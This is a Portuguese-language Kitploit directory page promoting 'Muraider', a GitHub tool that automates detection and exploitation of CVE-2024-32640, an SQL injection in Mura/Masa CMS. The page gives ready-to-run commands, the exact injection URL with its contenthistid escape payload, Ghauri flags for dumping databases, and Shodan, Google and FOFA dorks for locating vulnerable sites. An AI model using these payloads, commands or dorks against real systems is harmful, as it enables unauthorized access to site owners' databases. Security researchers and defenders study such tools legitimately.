Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-32640-SQLI-MuraCMS — CVE-2024-32640 | PoC de Exploração Automática de SQLi | Kitploit
Ferramentas/GitHubGitHub/stuub/cve-2024-32640-sqli-muracms
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubstuub/cve-2024-32640-sqli-muracms

CVE-2024-32640-SQLI-MuraCMS

CVE-2024-32640 | PoC de Exploração Automática de SQLi

Ver Repositório
78122há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Muraider - Automatizando a detecção e exploração do CVE-2024-32640 \ SQLi no Mura/Masa CMS

Uso

Detecção:

python3 CVE-2024-32640.py --url https://target.com/

Exploração com Ghauri (Passe '-g' ou '--ghauri' como argumento):

Insira quaisquer argumentos que deseje usar com o Ghauri, seguindo sua lista de argumentos:

python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"

python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"

Exemplo

image

Automação SQLI com Ghauri:

Usando a detecção que implementei na ferramenta, podemos então usar o alvo vulnerável para explorar no Ghauri. O script automatiza esse processo, analisando todas as informações necessárias do alvo em uma chamada ao Ghauri.

image

Detalhes

Ao anexar uma sequência de escape (%5c) ao valor do parâmetro de consulta HTML contenthistid, somos capazes de verificar se um alvo é vulnerável a este SQLi.

A exploração bem-sucedida pode levar ao acesso não autorizado a dados sensíveis.

URL: https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x

Dorks

Consulta Shodan: 'Generator: Masa CMS'

Google: "powered by Mura CMS"

FOFA: app="Mura-CMS"

Referências:

https://twitter.com/HunterMapping/status/1790620695371911388

https://www.seebug.org/vuldb/ssvid-99835

Baixar ferramenta